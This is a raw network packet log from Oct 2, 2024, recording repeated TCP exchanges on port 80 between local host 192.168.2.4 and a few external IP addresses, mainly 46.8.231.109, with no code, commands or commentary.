Oct 2, 2024 09:41:19.570255995 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:19.575455904 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:19.831274033 CEST	49735	80	192.168.2.4	41.216.188.190
Oct 2, 2024 09:41:19.831469059 CEST	49743	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:19.831762075 CEST	49744	80	192.168.2.4	147.45.44.104
Oct 2, 2024 09:41:19.979541063 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:19.979758024 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:20.081819057 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:20.087924957 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:20.409543991 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:20.409769058 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:20.459405899 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:20.464508057 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:20.637511969 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:20.637535095 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:20.637584925 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:20.637788057 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:20.642350912 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:20.647305012 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:20.821237087 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:20.821257114 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:20.821266890 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:20.821276903 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:20.821283102 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:20.821293116 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:20.821304083 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:20.821331024 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:20.821475983 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:20.821476936 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:20.824364901 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:20.829184055 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.002832890 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.003016949 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.024800062 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.024800062 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.029686928 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.029721022 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.029777050 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.029881001 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.029910088 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.245502949 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.245683908 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.246103048 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.251010895 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.431461096 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.431477070 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.431484938 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.431494951 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.431504965 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.431514978 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.431762934 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.431762934 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.431762934 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.432126999 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.432173967 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.432441950 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.432476997 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.432512045 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.432852030 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.432885885 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.432921886 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.432956934 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.432990074 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.432990074 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.432990074 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.432990074 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.432990074 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.433124065 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.433626890 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.433826923 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.512345076 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.512386084 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.512422085 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.512460947 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.512510061 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.512518883 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.512518883 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.512547970 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.512583971 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.512679100 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.512679100 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.512679100 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.512679100 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.519715071 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.519747019 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.519804001 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.519836903 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.519870996 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.519922972 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.519954920 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.519989014 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.520050049 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.520050049 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.520050049 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.520050049 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.520050049 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.520752907 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.520787001 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.520819902 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.520872116 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.520936966 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.521190882 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.521223068 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.521255970 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.521295071 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.521330118 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.521363974 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.521416903 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.521416903 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.521416903 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.521559000 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.522197962 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.522249937 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.522283077 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.522315025 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.522347927 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.522381067 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.522433043 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.522433043 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.522433043 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.522593975 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.523112059 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.523349047 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.593267918 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.593300104 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.593312025 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.593321085 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.593331099 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.593342066 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.593354940 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.593396902 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.593396902 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.593396902 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.593396902 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.593842983 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.603224039 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.603259087 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.603295088 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.603337049 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.603369951 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.603415012 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.603415012 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.603415012 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.603452921 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.603485107 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.603523016 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.603626966 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.603679895 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.603713989 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.603749990 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.603765011 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.603765011 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.603765011 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.603765011 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.603945017 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.603945017 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.608289003 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.608323097 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.608378887 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.608412981 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.608467102 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.608500957 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.608546972 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.608578920 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.608607054 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.608607054 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.608607054 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.608607054 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.608613014 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.608648062 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.608669043 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.608669043 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.608669043 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.608684063 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.608937979 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.608937979 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.609338999 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.609371901 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.609406948 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.609458923 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.609637976 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.609666109 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.609720945 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.609755039 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.609791994 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.609824896 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.609858990 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.609893084 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.609926939 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.610001087 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.610001087 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.610001087 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.610001087 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.610434055 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.610601902 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.610635996 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.610690117 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.610722065 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.610758066 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.610790968 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.610806942 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.610806942 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.610806942 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.610806942 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.610825062 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.610865116 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.611021996 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.611021996 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.611021996 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.611535072 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.611567974 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.611619949 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.611651897 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.611685991 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.611721039 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.611763954 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.611763954 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.611763954 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.611763954 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.611763954 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.611969948 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.682003021 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.682018995 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.682029963 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.682041883 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.682053089 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.682082891 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.682082891 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.682173967 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.689373970 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.689405918 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.689448118 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.689502954 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.689536095 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.689570904 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.689620972 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.689652920 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.689688921 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.689717054 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.689752102 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.689873934 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.689918041 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.689918041 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.689918041 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.689918041 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.689918041 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.689918041 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.689918041 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.689928055 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.689964056 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.689997911 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.690116882 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.690172911 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.690224886 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.690258980 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.690294027 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.690329075 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.690468073 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.690521002 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.690572977 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.690608978 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.690637112 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.690637112 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.690637112 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.690637112 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.690637112 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.690637112 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.690637112 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.690645933 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.690897942 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.691782951 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.696703911 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.696738958 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.696782112 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.696834087 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.696870089 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.696922064 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.696980000 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.697012901 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.697046995 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.697081089 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.697117090 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.697149992 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.697181940 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.697195053 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.697195053 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.697195053 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.697195053 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.697195053 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.697195053 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.697195053 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.697216988 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.697256088 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.697427988 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.697520018 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.697552919 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.697607040 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.697639942 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.697691917 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.697743893 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.697778940 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.697812080 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.697846889 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.697861910 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.697861910 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.697861910 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.697861910 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.697861910 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.697861910 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.697861910 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.697884083 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.698093891 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.698148012 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.698183060 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.698249102 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.698282003 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.698314905 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.698349953 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.698402882 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.698436022 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.698470116 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.698478937 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.698478937 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.698478937 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.698478937 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.698478937 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.698478937 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.698478937 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.698504925 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.698539019 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.698575020 CEST	80	49749	46.8.231.109	192.168.2.4
Oct 2, 2024 09:41:21.698720932 CEST	49749	80	192.168.2.4	46.8.231.109
Oct 2, 2024 09:41:21.698720932 CEST	49749	80	192.168.2.4	46.8.231.109
